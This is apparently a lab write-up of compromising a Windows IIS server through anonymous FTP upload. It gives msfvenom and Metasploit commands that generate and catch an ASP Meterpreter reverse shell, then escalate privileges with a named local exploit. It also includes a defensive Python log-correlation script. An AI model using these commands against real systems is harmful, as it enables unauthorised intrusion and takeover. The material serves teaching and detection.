When testing, my initial scanning almost always includes Nmap, Nikto and Dirbuster. Starting with Nmap we have:

nmap -sS -A -T4 --top-ports 500 10.10.10.5

Nmap scan report for 10.10.10.5
Host is up (0.052s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
In parallel I fired up Nikto and Dirbuster, but nothing important came up. Based on the Nmap results, port 21 (FTP) and port 80 (Microsoft IIS) are open. It isn't so common to see the FTP port open, so let's try and access it. Apparently you can access the server files using FTP via anonymous login.

Awesome, we can now pass a .asp shell using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipaddress LPORT=port -f asp > shell.asp
Then pass it, using FTP, to the server:

ftp 10.10.10.5
ftp> put shell.asp

The final step is to fire up msfconsole and set up the handler:

msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LHOST ipaddress
msf> set LPORT port
msf> exploit -j

Then browse to http://10.10.10.5/shell.asp and wait for the connection to take place.
Apparently my shell was not working. At the time that was a bit weird, but in order to see what was going on, a friend of mine suggested building a Windows 7 VM with IIS to see what was wrong. I tried to set it up with the same permissions I had in the box and then checked the shell.asp code. Allowing errors to show in IIS helped me identify that in line 60 (see image below) my shellcode tried to create a file in a location that the user could not write to, so we need to modify that.

As a result, I changed it to C:\inetpub\wwwroot\file.exe, where I was sure I could write.

Tried again and boom, we have a working shell.
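The pattern above (an anonymous FTP upload of a server-side script into the web root, followed by an HTTP request for that same file) is also what a defender should be looking for in the logs. The following is an added example, not part of the original writeup: it correlates constructed FTP and IIS log lines in a simplified W3C-style layout (an assumption; real IIS logs declare their own field order in a #Fields header) and flags uploads by the anonymous user that are later requested over HTTP.

```python
import os
from typing import Dict, List

# Constructed sample log lines (not from the box), in a simplified
# W3C-style layout assumed here:
#   date time c-ip cs-username cs-method cs-uri-stem sc-status
FTP_LOG = """\
2023-01-01 10:00:01 10.10.14.2 anonymous USER anonymous 331
2023-01-01 10:00:05 10.10.14.2 anonymous STOR /shell.asp 226
2023-01-01 10:00:09 10.10.14.2 anonymous STOR /notes.txt 226
2023-01-01 10:01:00 10.10.14.7 backup STOR /reports/q1.pdf 226"""

IIS_LOG = """\
2023-01-01 10:00:20 10.10.14.2 - GET /shell.asp 200
2023-01-01 10:00:30 10.10.14.9 - GET /index.html 200"""

# Extensions IIS hands to a script engine instead of serving as static files.
SCRIPT_EXTS = (".asp", ".aspx", ".ashx", ".asmx")


def parse(text: str) -> List[Dict[str, str]]:
    """Split each log line into named fields; malformed lines are skipped."""
    fields = ("date", "time", "c_ip", "user", "method", "uri", "status")
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == len(fields):
            rows.append(dict(zip(fields, parts)))
    return rows


def anonymous_script_uploads(ftp_text: str) -> List[Dict[str, str]]:
    """Completed uploads (STOR, status 226) of a script by the anonymous user."""
    return [r for r in parse(ftp_text)
            if r["user"].lower() == "anonymous" and r["method"] == "STOR"
            and r["status"] == "226"
            and os.path.splitext(r["uri"].lower())[1] in SCRIPT_EXTS]


def correlate(ftp_text: str, iis_text: str) -> List[Dict[str, str]]:
    """Flag uploaded scripts that were requested over HTTP after the upload."""
    uploads = {u["uri"].lower(): u for u in anonymous_script_uploads(ftp_text)}
    alerts = []
    for req in parse(iis_text):
        up = uploads.get(req["uri"].lower())
        if up and (req["date"], req["time"]) >= (up["date"], up["time"]):
            alerts.append({"path": req["uri"], "uploaded_by": up["c_ip"],
                           "requested_by": req["c_ip"],
                           "at": f'{req["date"]} {req["time"]}'})
    return alerts


if __name__ == "__main__":
    for alert in correlate(FTP_LOG, IIS_LOG):
        print("ALERT: anonymous FTP upload executed via web:", alert)
```

The cheaper fix is of course to not let the anonymous FTP user write into wwwroot at all; the correlation is there to catch the case where that permission slipped through.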
Now, since we are looking for a quick win here, we run getsystem, but we get an "Operation failed: Access is denied". However, we can then run a pretty neat Metasploit post-exploitation module called local_exploit_suggester.

The best technique you can use now is trial and error, until you find a working exploit. If all of them fail, there are other techniques that we could use (PowerShell, etc. - maybe in another writeup). Here it is a bit easier, because the ms13_053_schlamperei exploit works.

I believe that these types of boxes, which are easy to pwn, are also able to teach someone a few important lessons. One of them is that you should never rely 100% on the tools you are using, and if you are stuck, always try to simulate the situation you are in, in order to understand what's going wrong. The last thing to take away from this writeup is that Metasploit is an amazing framework with loads of exploits and post-exploitation techniques.